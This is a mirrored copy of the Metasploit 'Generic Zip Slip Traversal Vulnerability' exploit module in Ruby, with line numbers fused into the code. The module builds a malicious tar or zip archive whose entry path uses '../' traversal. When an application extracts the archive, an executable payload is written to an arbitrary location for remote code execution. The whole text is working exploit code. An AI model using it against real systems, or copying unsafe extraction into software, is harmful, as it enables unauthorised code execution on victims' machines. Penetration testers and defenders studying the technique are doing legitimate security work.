CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/fileformat/zip_slip.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rex/zip'67class MetasploitModule < Msf::Exploit::Remote8Rank = ManualRanking910include Msf::Exploit::FILEFORMAT11include Msf::Exploit::EXE1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Generic Zip Slip Traversal Vulnerability',18'Description' => %q{19This is a generic arbitrary file overwrite technique, which typically results in remote20command execution. This targets a simple yet widespread vulnerability that has been21seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.22The idea is that often archive extraction libraries have no mitigations against23directory traversal attacks. If an application uses it, there is a risk when opening an24archive that is maliciously modified, and result in the embedded payload to be written25to an arbitrary location (such as a web root), and result in remote code execution.26},27'License' => MSF_LICENSE,28'Author' =>29[30'Snyk', # Technique discovery31'sinn3r', # Metasploit32'ggkitsas'33],34'References' =>35[36['URL', 'https://snyk.io/research/zip-slip-vulnerability']37],38'DefaultOptions' =>39{40'EXITFUNC' => 'thread',41'DisablePayloadHandler' => true42},43'Platform' => ['linux', 'win', 'unix'],44'Targets' =>45[46['Manually determined', {}]47],48'Privileged' => false,49'DisclosureDate' => '2018-06-05'50)51)5253register_options([54OptString.new('FILENAME', [true, 'The name of the archive file', 'msf.tar']),55OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),56OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])57])58end5960class ZipSlipArchive61attr_reader :data62attr_reader :fname63attr_reader :payload64attr_reader :type6566def initialize(n, p, t)67@fname = n68@payload = p69@type = t70@data = make71end7273def make74data = ''75path = Rex::FileUtils.normalize_unix_path(fname)7677if type == 'tar'78contents = StringIO.new79Rex::Tar::Writer.new(contents) do |t|80t.add_file(path, 0o777) do |f|81f.write(payload)82end83end84contents.seek(0)85data = contents.read86contents.close87data88elsif type == 'zip'89zip = Rex::Zip::Archive.new90zip.add_file(path, payload)91data = zip.pack92end93end94end9596def make_archive(target_payload_path, type)97elf = generate_payload_exe(code: payload.encoded)98archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe, type)99archive.make100end101102def exploit103target_payload_path = datastore['TARGETPAYLOADPATH']104unless target_payload_path.match(%r{\.\./})105print_error('Please set a traversal path')106return107end108109archive = make_archive(target_payload_path, datastore['FTYPE'])110file_create(archive)111print_status('When extracted, the payload is expected to extract to:')112print_status(target_payload_path)113end114end115116# A quick test:117#118# $ python119# >>> import tarfile120# >>> t = tarfile.open('test.tar')121# >>> t.extractall()122# >>> exit()123#124125126